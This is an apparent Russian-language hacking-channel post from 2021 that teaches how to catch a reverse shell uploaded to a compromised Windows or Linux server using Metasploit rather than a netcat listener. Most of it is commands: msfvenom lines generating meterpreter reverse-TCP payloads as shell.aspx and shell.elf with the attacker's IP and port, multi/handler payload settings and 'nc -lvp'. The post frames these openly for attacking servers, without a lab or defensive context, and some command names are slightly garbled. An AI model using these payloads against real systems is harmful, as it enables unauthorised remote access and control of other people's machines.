2021-07-10 12:00:43
Всем Асап, Это Питон. Сегодня я расскажу вам как получить удаленный доступ к компьютеру или серверу если у вас есть такая возможность. Для этой цели мы будем использовать Metasploit.
В этот раз, мы не будем говорить о случае, когда у сайта на серваке стоит программное обеспечение старой версии. Разберем вариант, когда вам удалось загрузить туда reverse shelll или же попросту обратную оболочку.
На этом этапе, найдутся знающие люди которые спросят меня, мол зачем тут Metasploit. Ведь мы можем просто открыть нужный порт прописав что-то вроде: nc -lvp ваш порт.
Вот причины по которым выгодно делать это через Metasploit.
1)Обратная оболочка в Metasploit более надежная. И не так быстро разрывается если что-то случится.
2) Вы можете заспавнить оболочку в meterpreter просто написав shell.
3)Вы можете иметь неограниченное количество сессий и свободно переключаться между ними.
Итак перейдем в делу. Есть несколько вариантов использования Metasploit.
Если атакуемый сервер это Windows - то вот ваша полезная нагрузка:
🗨 msfvenom -p windows/x64/meterpreter
reversetcp lhost=Ваш ip lport=Ваш порт -f aspx -o shell.aspx
При этом название используемого эксплойта будет:🗨 use exploit/multi/handler
* Using configured payload generic/shell
reversetcp
msf5 exploit(multi/handler) >
🗨 set payload windows/x64/meterpreter
reversetcp
Если аттакуемый сервер это Linux - то ваша полезная нагрузка:
🗨 msfvenom -p linux/x86/meterpreter/reverse
tcp LHOST=[Ваш ip] LPORT=[Ваш порт] -f elf > shell.elf
Это payload внутри опций в настройках.
🗨set payload linux/x86/meterpreter/reversetcp
В общем надеюсь кто шарит смог что-то показать. Кто не шарит, сделаю скоро более вводный гайд по оболочкам и подключению к ним. Всем удачи
100 views09:00